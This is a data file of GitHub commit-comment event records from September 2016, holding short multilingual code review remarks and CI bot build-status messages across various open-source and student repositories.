{"id":"4583172552","type":"CommitCommentEvent","actor":{"login":"bloatware"},"repo":{"name":"textpattern/textpattern"},"payload":{"comment":{"id":19078232,"position":null,"line":null,"path":null,"commit_id":"4cb72a885113b467328ac7c4c82f97b7350165e1","created_at":"2016-09-19T13:07:11Z","updated_at":"2016-09-19T13:07:11Z","body":"That sounds great! Probably, messages might be event-specific, to be more pertinent?"}},"created_at":"2016-09-19T13:07:11Z"}
{"id":"4583177418","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19078242,"position":null,"line":null,"path":null,"commit_id":"d2705f74863526b9fc5cb808e998786f9c9f0b50","created_at":"2016-09-19T13:08:10Z","updated_at":"2016-09-19T13:08:10Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#OMPdYuhTRVewg5O3q-AbEw"}},"created_at":"2016-09-19T13:08:10Z"}
{"id":"4583180210","type":"CommitCommentEvent","actor":{"login":"dseah1"},"repo":{"name":"gadiex/github-for-web-designers"},"payload":{"comment":{"id":19078246,"position":null,"line":null,"path":null,"commit_id":"2296cf05ef993a66e30a5a0ee4ab044abf49726c","created_at":"2016-09-19T13:08:42Z","updated_at":"2016-09-19T13:08:42Z","body":"resolved conflick"}},"created_at":"2016-09-19T13:08:42Z"}
{"id":"4583180258","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19078247,"position":null,"line":null,"path":null,"commit_id":"5a85e213ad2a6bb2fcdc2521e5422cbceef91b48","created_at":"2016-09-19T13:08:43Z","updated_at":"2016-09-19T13:08:43Z","body":"#350 #359"}},"created_at":"2016-09-19T13:08:43Z"}
{"id":"4583183671","type":"CommitCommentEvent","actor":{"login":"dseah1"},"repo":{"name":"gadiex/github-for-web-designers"},"payload":{"comment":{"id":19078258,"position":null,"line":null,"path":null,"commit_id":"2296cf05ef993a66e30a5a0ee4ab044abf49726c","created_at":"2016-09-19T13:09:25Z","updated_at":"2016-09-19T13:09:25Z","body":"resolving the conflict in glossary.html"}},"created_at":"2016-09-19T13:09:25Z"}
{"id":"4583186128","type":"CommitCommentEvent","actor":{"login":"infosser"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":19078265,"position":null,"line":null,"path":null,"commit_id":"ba7291314ebe846466fc286f7b80c7d48fe07a30","created_at":"2016-09-19T13:09:50Z","updated_at":"2016-09-19T13:09:50Z","body":"![1321231](https://cloud.githubusercontent.com/assets/22296140/18633128/f41d5970-7ea4-11e6-96b1-d00b04af1e15.png)\r\n\r\n เปิด x0 แล้วมีปัญหานี้อะครับ"}},"created_at":"2016-09-19T13:09:50Z"}
{"id":"4583187610","type":"CommitCommentEvent","actor":{"login":"SoulTree"},"repo":{"name":"SoulTree/20123077"},"payload":{"comment":{"id":19078267,"position":null,"line":null,"path":null,"commit_id":"5f90369d3ff3d8f8ce7a122aade628630d46b972","created_at":"2016-09-19T13:10:13Z","updated_at":"2016-09-19T13:10:13Z","body":"Assignment"}},"created_at":"2016-09-19T13:10:13Z"}
{"id":"4583187683","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"hiramatch/instagram_dic"},"payload":{"comment":{"id":19078268,"position":6,"line":11,"path":"app/controllers/application_controller.rb","commit_id":"38b8ca70ac3b5f0bb3671f038f081eecbbebda5f","created_at":"2016-09-19T13:10:14Z","updated_at":"2016-09-19T13:10:14Z","body":"インデントがおかしいです。\r\nコーディング規約に忠実に記載してください。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-19T13:10:14Z"}
{"id":"4583188995","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"hiramatch/instagram_dic"},"payload":{"comment":{"id":19078270,"position":2,"line":2,"path":"app/controllers/users/registrations_controller.rb","commit_id":"38b8ca70ac3b5f0bb3671f038f081eecbbebda5f","created_at":"2016-09-19T13:10:29Z","updated_at":"2016-09-19T13:10:29Z","body":"コメント不要です。\r\nコーディング規約に忠実に記載してください。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-19T13:10:29Z"}
{"id":"4583190125","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"hiramatch/instagram_dic"},"payload":{"comment":{"id":19078274,"position":14,"line":14,"path":"app/controllers/users/registrations_controller.rb","commit_id":"38b8ca70ac3b5f0bb3671f038f081eecbbebda5f","created_at":"2016-09-19T13:10:40Z","updated_at":"2016-09-19T13:10:40Z","body":"こちらも不要です。\r\nコーディング規約に忠実に記載してください。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-19T13:10:40Z"}
{"id":"4583190986","type":"CommitCommentEvent","actor":{"login":"sle-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19078276,"position":null,"line":null,"path":null,"commit_id":"b8a9b764872d671a3fa475d98bde517775a16cbc","created_at":"2016-09-19T13:10:50Z","updated_at":"2016-09-19T13:10:50Z","body":"note: \"finish order\" doens't raise anything and seems to do the same thing.."}},"created_at":"2016-09-19T13:10:50Z"}
{"id":"4583191437","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"hiramatch/instagram_dic"},"payload":{"comment":{"id":19078278,"position":5,"line":8,"path":"app/views/devise/confirmations/new.html.erb","commit_id":"38b8ca70ac3b5f0bb3671f038f081eecbbebda5f","created_at":"2016-09-19T13:10:56Z","updated_at":"2016-09-19T13:10:56Z","body":"deviseのメソッドではダメなのでしょうか？"}},"created_at":"2016-09-19T13:10:56Z"}
{"id":"4583192462","type":"CommitCommentEvent","actor":{"login":"muikka"},"repo":{"name":"muikka/Projelerim"},"payload":{"comment":{"id":19078279,"position":48,"line":48,"path":"MvcLearning/MvcLearning/Views/Customers/CustomerForm.cshtml","commit_id":"e5bb004ea1d5f23b007027fba4d1a171d26d5d98","created_at":"2016-09-19T13:11:10Z","updated_at":"2016-09-19T13:11:10Z","body":"client side validation"}},"created_at":"2016-09-19T13:11:10Z"}
{"id":"4583192495","type":"CommitCommentEvent","actor":{"login":"avifried1"},"repo":{"name":"7thsky/openvv"},"payload":{"comment":{"id":19078280,"position":11,"line":39,"path":"src/org/openvv/js/OVVAsset.js","commit_id":"0d1077a01dd0678519cb9e6524587d9fcb3ed51f","created_at":"2016-09-19T13:11:10Z","updated_at":"2016-09-19T13:11:10Z","body":"yes"}},"created_at":"2016-09-19T13:11:10Z"}
{"id":"4583193434","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"hiramatch/instagram_dic"},"payload":{"comment":{"id":19078282,"position":7,"line":8,"path":"app/views/devise/registrations/new.html.erb","commit_id":"38b8ca70ac3b5f0bb3671f038f081eecbbebda5f","created_at":"2016-09-19T13:11:22Z","updated_at":"2016-09-19T13:11:22Z","body":"空白行、不要ですー。"}},"created_at":"2016-09-19T13:11:22Z"}
{"id":"4583196110","type":"CommitCommentEvent","actor":{"login":"JosephP91"},"repo":{"name":"JosephP91/curlcpp"},"payload":{"comment":{"id":19078293,"position":null,"line":null,"path":null,"commit_id":"8b336939351dd66b334432bb0fdda1d6b497f81d","created_at":"2016-09-19T13:11:52Z","updated_at":"2016-09-19T13:11:52Z","body":"Fixed warnings #91 "}},"created_at":"2016-09-19T13:11:52Z"}
{"id":"4583197866","type":"CommitCommentEvent","actor":{"login":"sekrett"},"repo":{"name":"sekrett/database"},"payload":{"comment":{"id":19078298,"position":null,"line":null,"path":null,"commit_id":"7531f1b02eaef44f33ef6d3d5a0fee9bc943bf45","created_at":"2016-09-19T13:12:13Z","updated_at":"2016-09-19T13:12:13Z","body":"All three `.empty?` changes introduce bug. Should be reverted."}},"created_at":"2016-09-19T13:12:13Z"}
{"id":"4583198131","type":"CommitCommentEvent","actor":{"login":"fix"},"repo":{"name":"LiskHQ/lisk"},"payload":{"comment":{"id":19078299,"position":null,"line":null,"path":null,"commit_id":"e1b712566e8f32c4339695667a9f2214b4c63695","created_at":"2016-09-19T13:12:17Z","updated_at":"2016-09-19T13:12:17Z","body":"nice!"}},"created_at":"2016-09-19T13:12:17Z"}
{"id":"4583198914","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"hiramatch/instagram_dic"},"payload":{"comment":{"id":19078304,"position":4,"line":4,"path":"app/views/devise/sessions/new.html.erb","commit_id":"38b8ca70ac3b5f0bb3671f038f081eecbbebda5f","created_at":"2016-09-19T13:12:26Z","updated_at":"2016-09-19T13:12:26Z","body":"色が装飾されていないnoticeは見にくかったです。"}},"created_at":"2016-09-19T13:12:26Z"}
{"id":"4583200015","type":"CommitCommentEvent","actor":{"login":"reitermarkus"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":19078308,"position":null,"line":null,"path":null,"commit_id":"a212340cc1c7922b17c9ed35c01ea8bef05a9e9d","created_at":"2016-09-19T13:12:37Z","updated_at":"2016-09-19T13:12:37Z","body":"`Caskroom` should probably be relative to `HOMEBREW_PREFIX`."}},"created_at":"2016-09-19T13:12:37Z"}
{"id":"4583201059","type":"CommitCommentEvent","actor":{"login":"lakruzz"},"repo":{"name":"Praqma/praqma.github.io"},"payload":{"comment":{"id":19078311,"position":6,"line":40,"path":"mailsignature/banners.json","commit_id":"0d9572657661e51c0862736330e214fc9de364fb","created_at":"2016-09-19T13:12:50Z","updated_at":"2016-09-19T13:12:50Z","body":"Great job! @bicschneider "}},"created_at":"2016-09-19T13:12:50Z"}
{"id":"4583201828","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"hiramatch/instagram_dic"},"payload":{"comment":{"id":19078315,"position":4,"line":4,"path":"app/controllers/users/omniauth_callbacks_controller.rb","commit_id":"d1644139351cdadeb71c7314ba2bd8bace697c92","created_at":"2016-09-19T13:12:58Z","updated_at":"2016-09-19T13:12:58Z","body":"空白行不要です。\r\nコーディング規約に沿ってください。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-19T13:12:58Z"}
{"id":"4583202023","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19078316,"position":null,"line":null,"path":null,"commit_id":"7bc1c322ce814693a88e39ec84a16ecad2ee1bfb","created_at":"2016-09-19T13:13:00Z","updated_at":"2016-09-19T13:13:00Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#EHjTzbUtRheSJw-d8m3vQA"}},"created_at":"2016-09-19T13:13:00Z"}
{"id":"4583202937","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"hiramatch/instagram_dic"},"payload":{"comment":{"id":19078323,"position":15,"line":15,"path":"app/controllers/users/omniauth_callbacks_controller.rb","commit_id":"d1644139351cdadeb71c7314ba2bd8bace697c92","created_at":"2016-09-19T13:13:13Z","updated_at":"2016-09-19T13:13:13Z","body":"メソッド内のコメント不要です。\r\nコーディング規約に沿ってください。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-19T13:13:13Z"}
{"id":"4583205926","type":"CommitCommentEvent","actor":{"login":"lakruzz"},"repo":{"name":"Praqma/praqma.github.io"},"payload":{"comment":{"id":19078331,"position":6,"line":40,"path":"mailsignature/banners.json","commit_id":"0d9572657661e51c0862736330e214fc9de364fb","created_at":"2016-09-19T13:13:44Z","updated_at":"2016-09-19T13:13:44Z","body":"But lets fix it anyway! @bicschneider "}},"created_at":"2016-09-19T13:13:44Z"}
{"id":"4583206219","type":"CommitCommentEvent","actor":{"login":"Eddydpyl"},"repo":{"name":"Eddydpyl/FABS"},"payload":{"comment":{"id":19078333,"position":null,"line":null,"path":null,"commit_id":"36c13d0ee8c0f91e4417aa7cdaf1c9db6c7ae752","created_at":"2016-09-19T13:13:48Z","updated_at":"2016-09-19T13:13:48Z","body":"Will do until we introduce the rest of the collections."}},"created_at":"2016-09-19T13:13:48Z"}
{"id":"4583206723","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"hiramatch/instagram_dic"},"payload":{"comment":{"id":19078335,"position":17,"line":17,"path":"app/controllers/users/omniauth_callbacks_controller.rb","commit_id":"d1644139351cdadeb71c7314ba2bd8bace697c92","created_at":"2016-09-19T13:13:53Z","updated_at":"2016-09-19T13:13:53Z","body":"空白行不要です。\r\nコーディング規約に沿ってください。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-19T13:13:53Z"}
{"id":"4583207366","type":"CommitCommentEvent","actor":{"login":"daniel-j-h"},"repo":{"name":"Project-OSRM/osrm-backend"},"payload":{"comment":{"id":19078338,"position":21,"line":263,"path":"profiles/car.lua","commit_id":"e734defa6911b473a9ce6e7cfd0201982148ec3c","created_at":"2016-09-19T13:13:59Z","updated_at":"2016-09-19T13:13:59Z","body":"I would love Lua to have a string split function but it does not. I checked; it's sad."}},"created_at":"2016-09-19T13:13:59Z"}
{"id":"4583207713","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"hiramatch/instagram_dic"},"payload":{"comment":{"id":19078340,"position":4,"line":4,"path":"app/helpers/application_helper.rb","commit_id":"d1644139351cdadeb71c7314ba2bd8bace697c92","created_at":"2016-09-19T13:14:03Z","updated_at":"2016-09-19T13:14:03Z","body":"空白行不要です。\r\nコーディング規約に沿ってください。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-19T13:14:03Z"}
{"id":"4583208167","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"hiramatch/instagram_dic"},"payload":{"comment":{"id":19078342,"position":12,"line":12,"path":"app/helpers/application_helper.rb","commit_id":"d1644139351cdadeb71c7314ba2bd8bace697c92","created_at":"2016-09-19T13:14:10Z","updated_at":"2016-09-19T13:14:10Z","body":"空白行不要です。\r\nコーディング規約に沿ってください。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-19T13:14:10Z"}
{"id":"4583208790","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"hiramatch/instagram_dic"},"payload":{"comment":{"id":19078345,"position":21,"line":21,"path":"app/helpers/application_helper.rb","commit_id":"d1644139351cdadeb71c7314ba2bd8bace697c92","created_at":"2016-09-19T13:14:18Z","updated_at":"2016-09-19T13:14:18Z","body":"ここも。\r\nコーディング規約に沿ってください。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-19T13:14:18Z"}
{"id":"4583209533","type":"CommitCommentEvent","actor":{"login":"daniel-j-h"},"repo":{"name":"Project-OSRM/osrm-backend"},"payload":{"comment":{"id":19078346,"position":29,"line":271,"path":"profiles/car.lua","commit_id":"e734defa6911b473a9ce6e7cfd0201982148ec3c","created_at":"2016-09-19T13:14:26Z","updated_at":"2016-09-19T13:14:26Z","body":"The same goes for a `all_of(sequence, predicate)` function; stdlib missing."}},"created_at":"2016-09-19T13:14:26Z"}
{"id":"4583209830","type":"CommitCommentEvent","actor":{"login":"avifried1"},"repo":{"name":"7thsky/openvv"},"payload":{"comment":{"id":19078347,"position":306,"line":745,"path":"src/org/openvv/js/OVVAsset.js","commit_id":"0d1077a01dd0678519cb9e6524587d9fcb3ed51f","created_at":"2016-09-19T13:14:28Z","updated_at":"2016-09-19T13:14:28Z","body":"comment is misleading, it doesn't invoke the callback"}},"created_at":"2016-09-19T13:14:28Z"}
{"id":"4583209987","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19078349,"position":null,"line":null,"path":null,"commit_id":"3a311556050ee70e71c43c3ca6bc86165174da77","created_at":"2016-09-19T13:14:29Z","updated_at":"2016-09-19T13:14:29Z","body":"#18519 should be a no op on llvm < 4"}},"created_at":"2016-09-19T13:14:29Z"}
{"id":"4583210748","type":"CommitCommentEvent","actor":{"login":"sekrett"},"repo":{"name":"chef-cookbooks/database"},"payload":{"comment":{"id":19078352,"position":null,"line":null,"path":null,"commit_id":"7531f1b02eaef44f33ef6d3d5a0fee9bc943bf45","created_at":"2016-09-19T13:14:38Z","updated_at":"2016-09-19T13:14:38Z","body":"All three .empty? changes introduce bug. Should be reverted. I included this in my PR: https://github.com/chef-cookbooks/database/pull/214"}},"created_at":"2016-09-19T13:14:38Z"}
{"id":"4583213112","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19078357,"position":null,"line":null,"path":null,"commit_id":"b724e2cd0087adca18edf2746078fd13a4f97f1e","created_at":"2016-09-19T13:15:04Z","updated_at":"2016-09-19T13:15:04Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2372 of 2372 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b724e2cd0087adca18edf2746078fd13a4f97f1e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b724e2cd0087adca18edf2746078fd13a4f97f1e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-19T13:15:04Z"}
{"id":"4583213397","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"hiramatch/instagram_dic"},"payload":{"comment":{"id":19078359,"position":3,"line":3,"path":"config/routes.rb","commit_id":"d1644139351cdadeb71c7314ba2bd8bace697c92","created_at":"2016-09-19T13:15:09Z","updated_at":"2016-09-19T13:15:09Z","body":"ロケット記法、Ruby1.8時代の書き方なのでやめましょう。"}},"created_at":"2016-09-19T13:15:09Z"}
{"id":"4583214084","type":"CommitCommentEvent","actor":{"login":"shubhiD"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":19078365,"position":30,"line":182,"path":"geocodertest.py","commit_id":"e58dc8da454668cce1ca10311328d366afacb01b","created_at":"2016-09-19T13:15:19Z","updated_at":"2016-09-19T13:15:19Z","body":"We can go with that"}},"created_at":"2016-09-19T13:15:19Z"}
{"id":"4583216952","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"hiramatch/instagram_dic"},"payload":{"comment":{"id":19078370,"position":14,"line":14,"path":"config/initializers/rails_admin.rb","commit_id":"23b5c864ad01cb1c6c8339ecdea2e2a135690973","created_at":"2016-09-19T13:15:50Z","updated_at":"2016-09-19T13:15:50Z","body":"こういうデフォルトのコメント不要です。\r\n"}},"created_at":"2016-09-19T13:15:50Z"}
{"id":"4583218908","type":"CommitCommentEvent","actor":{"login":"sle-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19078373,"position":null,"line":null,"path":null,"commit_id":"b8a9b764872d671a3fa475d98bde517775a16cbc","created_at":"2016-09-19T13:16:14Z","updated_at":"2016-09-19T13:16:14Z","body":"note: finish order and done shouldn't be dipslayed together\r\n\r\nif i say i produced more than the quantity to produce in a work order, this quantity is lost when i go back to the mo"}},"created_at":"2016-09-19T13:16:14Z"}
{"id":"4583227216","type":"CommitCommentEvent","actor":{"login":"carledriss"},"repo":{"name":"AT-01/pivotal-api-test1"},"payload":{"comment":{"id":19078386,"position":1,"line":1,"path":"src/test/resources/features/Comment/postComment.feature","commit_id":"0f0c2ea11b2cb6cd102f9d9a47d1c1ab81b594d8","created_at":"2016-09-19T13:17:44Z","updated_at":"2016-09-19T13:17:44Z","body":"@AT-01/team1 \r\nWhy do you have two packages for comments?\r\n- Comment\r\n- comment\r\n\r\nRemove one of them."}},"created_at":"2016-09-19T13:17:44Z"}
{"id":"4583229667","type":"CommitCommentEvent","actor":{"login":"CecilHarvey"},"repo":{"name":"FWGS/cs16-client"},"payload":{"comment":{"id":19078395,"position":24,"line":340,"path":"cl_dll/hud/hud.cpp","commit_id":"956d584c9f194e59f50e017057aad7d78cddfd10","created_at":"2016-09-19T13:18:17Z","updated_at":"2016-09-19T13:18:17Z","body":"BUG: infinite loop here! (NEVER go beyond the 2nd node)\r\nmaybe : \r\nfor( HUDLIST *pList = m_pHudList; pList; pList = pList->pNext )"}},"created_at":"2016-09-19T13:18:17Z"}
{"id":"4583232603","type":"CommitCommentEvent","actor":{"login":"paulolieuthier"},"repo":{"name":"lxde/lxqt-panel"},"payload":{"comment":{"id":19078401,"position":9,"line":200,"path":"CMakeLists.txt","commit_id":"0773ef8b47336f4d9b0fa10391db64190b58e36b","created_at":"2016-09-19T13:18:48Z","updated_at":"2016-09-19T13:18:48Z","body":"You can do as for cpuload:\r\n\r\n```\r\n     find_library(VARIABLE_NAME_HERE SysStat-Qt5)\r\n \r\n     if(NOT(${VARIABLE_NAME_HERE} MATCHES \"NOTFOUND\"))\r\n        ...\r\n```"}},"created_at":"2016-09-19T13:18:48Z"}
{"id":"4583234598","type":"CommitCommentEvent","actor":{"login":"MikeMcQuaid"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":19078409,"position":null,"line":null,"path":null,"commit_id":"a212340cc1c7922b17c9ed35c01ea8bef05a9e9d","created_at":"2016-09-19T13:19:14Z","updated_at":"2016-09-19T13:19:14Z","body":"@reitermarkus We'd have moved `Cellar` if we could. Top-level non-standard `/usr/local` directories are a recipe for pain and sadness. Poking around in there I'd store state in `/usr/local/var/brew-cask`, cached stuff in `HOMEBREW_CACHE` and symlink binaries to `/Applications` rather than the `Caskroom` (which, now there's no symlinks, has duplicate application bundles for no real reason I can tell)."}},"created_at":"2016-09-19T13:19:14Z"}
{"id":"4583234683","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19078410,"position":null,"line":null,"path":null,"commit_id":"b724e2cd0087adca18edf2746078fd13a4f97f1e","created_at":"2016-09-19T13:19:16Z","updated_at":"2016-09-19T13:19:16Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b724e2cd0087adca18edf2746078fd13a4f97f1e-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-19T13:19:16Z"}
{"id":"4583234991","type":"CommitCommentEvent","actor":{"login":"sedwards2009"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19078411,"position":48,"line":284,"path":"src/utils/linearAlg2D.h","commit_id":"72f09d3fa00cd7087b3372843fdc8da2f93c59fd","created_at":"2016-09-19T13:19:19Z","updated_at":"2016-09-19T13:19:19Z","body":"This line breaks when compiling on Windows 32bit using gcc 5.3.0. (It probably breaks when compiling on 64bit Windows too.)\r\n\r\ngcc says: `error: no matching function for call to 'max(long int, int64_t)'`\r\n\r\nIt looks like those ints are not the same size.\r\n\r\nhttps://software.intel.com/en-us/articles/size-of-long-integer-type-on-different-architecture-and-os\r\n"}},"created_at":"2016-09-19T13:19:19Z"}
{"id":"4583236325","type":"CommitCommentEvent","actor":{"login":"tivisse"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19078415,"position":25,"line":84,"path":"addons/sale/models/sale_analytic.py","commit_id":"a9875b03dd9332019174fcd90425e432d6fd924b","created_at":"2016-09-19T13:19:32Z","updated_at":"2016-09-19T13:19:32Z","body":"Bravo"}},"created_at":"2016-09-19T13:19:32Z"}
{"id":"4583238758","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19078422,"position":null,"line":null,"path":null,"commit_id":"5507a58ef0f71ed3c5eb11727b199ae6bbaa61ab","created_at":"2016-09-19T13:19:59Z","updated_at":"2016-09-19T13:19:59Z","body":"#358 "}},"created_at":"2016-09-19T13:19:59Z"}
{"id":"4583239699","type":"CommitCommentEvent","actor":{"login":"yuyichao"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19078423,"position":null,"line":null,"path":null,"commit_id":"3a311556050ee70e71c43c3ca6bc86165174da77","created_at":"2016-09-19T13:20:11Z","updated_at":"2016-09-19T13:20:11Z","body":"Don't really have spare cycles to bisect this right now but this is more likely caused by lowering and type inference rather than codegen. #18520 should also only affect debug info and coverage."}},"created_at":"2016-09-19T13:20:11Z"}
{"id":"4583241776","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ananya-bhattacharya/hydrator-plugins"},"payload":{"comment":{"id":19078425,"position":null,"line":null,"path":null,"commit_id":"980c6c19cdca082efb56da2bafb5258377982939","created_at":"2016-09-19T13:20:37Z","updated_at":"2016-09-19T13:20:37Z","body":"Refactored Decision Tree Regression code using the common code logic in SparkUtility.\r\nPlease review again. Thanks!"}},"created_at":"2016-09-19T13:20:37Z"}
{"id":"4583243119","type":"CommitCommentEvent","actor":{"login":"aquileia"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19078427,"position":null,"line":null,"path":null,"commit_id":"ab6369098f97cb028041b7c86e7a24d66c2317c7","created_at":"2016-09-19T13:20:52Z","updated_at":"2016-09-19T13:20:52Z","body":"Nicely done! I hope you agree that e2549c1 by itself wouldn't have worked, but merging it into the vcxproj is perfect."}},"created_at":"2016-09-19T13:20:52Z"}
{"id":"4583245568","type":"CommitCommentEvent","actor":{"login":"pellox69"},"repo":{"name":"oc-courses/javascript-web"},"payload":{"comment":{"id":19078430,"position":null,"line":null,"path":null,"commit_id":"95f78707470d02551f401cf5cd77ef4b6cc960f7","created_at":"2016-09-19T13:21:21Z","updated_at":"2016-09-19T13:21:21Z","body":"pourquoi ne pas avoir mis :\r\n`function afficherEnfant(noeud, indice) {\r\n//console.log(noeud.nodeType === document.ELEMENT_NODE);\r\nvar longueurNoeud=noeud.childNodes.length;\r\n\r\n\r\nif (noeud.nodeType !== document.ELEMENT_NODE)\r\n    console.error(\"Type de noeud incorrect\");\r\nelse if((indice<0)||(indice>=longueurNoeud))\r\n    console.error(\"Indice incorrect\");\r\nelse \r\n    console.log(noeud.childNodes[indice]);   \r\n}`\r\namicalement"}},"created_at":"2016-09-19T13:21:21Z"}
{"id":"4583247026","type":"CommitCommentEvent","actor":{"login":"carledriss"},"repo":{"name":"AT-01/pivotal-api-test1"},"payload":{"comment":{"id":19078432,"position":33,"line":22,"path":"src/test/resources/features/Comment/comment.feature","commit_id":"0f0c2ea11b2cb6cd102f9d9a47d1c1ab81b594d8","created_at":"2016-09-19T13:21:37Z","updated_at":"2016-09-19T13:21:37Z","body":"@AT-01/team1 \r\nWhere are the assertions?"}},"created_at":"2016-09-19T13:21:37Z"}
{"id":"4583252399","type":"CommitCommentEvent","actor":{"login":"darkleaf"},"repo":{"name":"maximtop/check-guess-clj"},"payload":{"comment":{"id":19078446,"position":18,"line":18,"path":"src/check_score_clj/core.clj","commit_id":"3acd5fb36b5a41898a0d62da71f8bd269a41f5a1","created_at":"2016-09-19T13:22:38Z","updated_at":"2016-09-19T13:22:38Z","body":"У тебя все-таки библиотека и просили только функцию написать."}},"created_at":"2016-09-19T13:22:38Z"}
{"id":"4583253407","type":"CommitCommentEvent","actor":{"login":"carledriss"},"repo":{"name":"AT-01/pivotal-api-test1"},"payload":{"comment":{"id":19078449,"position":18,"line":18,"path":"src/test/resources/features/Comment/postComment.feature","commit_id":"0f0c2ea11b2cb6cd102f9d9a47d1c1ab81b594d8","created_at":"2016-09-19T13:22:48Z","updated_at":"2016-09-19T13:22:48Z","body":"@AT-01/team1 \r\nWhere are the assertions?"}},"created_at":"2016-09-19T13:22:48Z"}
{"id":"4583253834","type":"CommitCommentEvent","actor":{"login":"carledriss"},"repo":{"name":"AT-01/pivotal-api-test1"},"payload":{"comment":{"id":19078450,"position":28,"line":28,"path":"src/test/resources/features/Comment/postComment.feature","commit_id":"0f0c2ea11b2cb6cd102f9d9a47d1c1ab81b594d8","created_at":"2016-09-19T13:22:52Z","updated_at":"2016-09-19T13:22:52Z","body":"@AT-01/team1 \r\nWhere are the assertions?"}},"created_at":"2016-09-19T13:22:52Z"}
{"id":"4583257693","type":"CommitCommentEvent","actor":{"login":"airwolff"},"repo":{"name":"airwolff/prime_prestudy_06_resume"},"payload":{"comment":{"id":19078458,"position":null,"line":null,"path":null,"commit_id":"02d32ce3258279fd24c9876b9aab1f38b35e7f75","created_at":"2016-09-19T13:23:39Z","updated_at":"2016-09-19T13:23:39Z","body":"Couldn't get jQuery to work properly. Still working on it."}},"created_at":"2016-09-19T13:23:39Z"}
{"id":"4583260971","type":"CommitCommentEvent","actor":{"login":"darkleaf"},"repo":{"name":"maximtop/check-guess-clj"},"payload":{"comment":{"id":19078464,"position":8,"line":8,"path":"src/check_score_clj/core.clj","commit_id":"3acd5fb36b5a41898a0d62da71f8bd269a41f5a1","created_at":"2016-09-19T13:24:15Z","updated_at":"2016-09-19T13:24:15Z","body":"Не нужно использовать read-string там, где это не требуется. Тебе нужно число распарсить, а не clojure выражение. Есть функция bigint, вроде так называется."}},"created_at":"2016-09-19T13:24:15Z"}
